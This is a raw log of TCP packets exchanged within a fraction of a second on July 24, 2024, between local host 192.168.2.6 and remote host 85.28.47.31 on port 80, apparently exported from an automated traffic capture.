                                                                                        Jul 24, 2024 07:14:17.518156052 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.518188953 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.518189907 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.518985033 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.518996000 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.519006014 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.519016027 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.519025087 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.519037008 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.519038916 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.519073963 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.519073963 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.519857883 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.519867897 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.519877911 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.519889116 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.519898891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.519910097 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.519917011 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.519917011 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.519948006 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.520745993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.520757914 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.520767927 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.520776987 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.520787001 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.520800114 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.520829916 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.520858049 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.521364927 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.521377087 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.521424055 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.608551979 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.608562946 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.608572006 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.608686924 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.608696938 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.608732939 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.608743906 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.608829975 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.608829975 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.608829975 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.608829975 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.609342098 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.609352112 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.609360933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.609370947 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.609380960 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.609390020 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.609400034 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.609436989 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.609437943 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.610222101 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.610233068 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.610243082 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.610253096 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.610280037 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.610311031 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.610728979 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.610738993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.610748053 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.610759020 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.610769033 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.610778093 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.610788107 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.610790014 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.610821009 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.610821009 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.610850096 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.611675024 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.611685991 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.611695051 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.611706018 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.611716986 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.611726999 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.611732006 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.611736059 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.611752033 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.611779928 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.611807108 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.612560987 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.612571955 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.612581015 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.612591028 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.612600088 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.612610102 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.612616062 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.612618923 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.612665892 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.613487959 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.613500118 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.613508940 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.613518953 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.613528013 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.613537073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.613545895 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.613549948 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.613549948 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.613555908 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.613569975 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.613610983 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.614465952 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.614476919 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.614487886 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.614499092 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.614510059 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.614518881 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.614520073 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.614528894 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.614537954 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.614559889 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.614588976 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.615345001 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.615360975 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.615370989 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.615381956 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.615391016 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.615401030 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.615406036 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.615406990 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.615411997 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.615421057 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.615430117 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.615447998 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.615468025 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.616389990 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.616400957 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.616410017 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.616420984 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.616430998 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.616441011 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.616445065 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.616477966 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.616477966 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.617048979 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.617058992 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.617065907 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.617077112 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.617084980 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.617094994 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.617100954 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.617105007 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.617115974 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.617121935 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.617126942 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.617137909 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.617137909 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.617147923 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.617153883 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.617172956 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.617188931 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.618012905 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.618024111 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.618036032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.618046045 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.618055105 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.618065119 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.618067980 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.618074894 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.618084908 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.618086100 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.618097067 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.618102074 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.618132114 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.618132114 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.619010925 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.619020939 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.619031906 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.619041920 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.619051933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.619061947 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.619062901 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.619071007 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.619081974 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.619082928 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.619091988 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.619100094 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.619118929 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.619146109 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.619918108 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.619929075 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.619939089 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.619949102 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.619960070 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.619976044 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.620011091 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.620011091 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.697976112 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.698055029 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.698174000 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.698185921 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.698224068 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.698224068 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.698224068 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.698312998 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.698407888 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.698417902 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.698467970 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.698554039 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.698565006 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.698575974 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.698599100 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.698632002 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.698805094 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.698852062 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.698863029 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.698873997 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.698873997 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.698885918 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.698893070 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.698915958 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.698942900 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.699419022 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.699482918 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.699496984 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.699548006 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.699575901 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.699630022 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.701493025 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.701560974 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.701565027 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.701571941 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.701606035 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.701634884 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.701731920 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.701744080 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.701754093 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.701766968 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.701791048 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.701819897 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.702240944 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.702292919 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.702307940 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.702356100 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.702465057 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.702476978 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.702488899 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.702519894 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.702548981 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.702817917 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.702828884 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.702840090 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.702868938 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.702900887 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.703080893 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.703140020 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.707210064 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.707279921 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.707315922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.707326889 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.707357883 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.707386971 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.708029032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.708039999 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.708049059 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.708059072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.708069086 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.708086967 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.708118916 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.708118916 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.708592892 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.708604097 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.708612919 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.708648920 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.708676100 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.709218979 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.709228039 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.709237099 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.709249020 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.709259987 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.709269047 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.709269047 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.709280014 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.709290028 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.709291935 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.709300041 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.709307909 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.709310055 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.709325075 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.709346056 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.710585117 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710596085 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710604906 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710614920 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710624933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710634947 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710644960 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710649014 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.710655928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710665941 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710675955 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710680962 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.710680962 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.710700035 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.710726023 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.710844040 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710855007 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710865021 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710874081 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710884094 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710887909 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.710895061 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710905075 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710907936 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.710916996 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710927963 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710931063 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.710939884 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.710949898 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.710971117 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.711000919 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.711128950 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711139917 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711148024 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711158991 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711169004 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711174965 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.711178064 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711189032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711195946 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.711198092 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711208105 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711215019 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.711219072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711234093 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.711261988 CEST4971180192.168.2.685.28.47.31
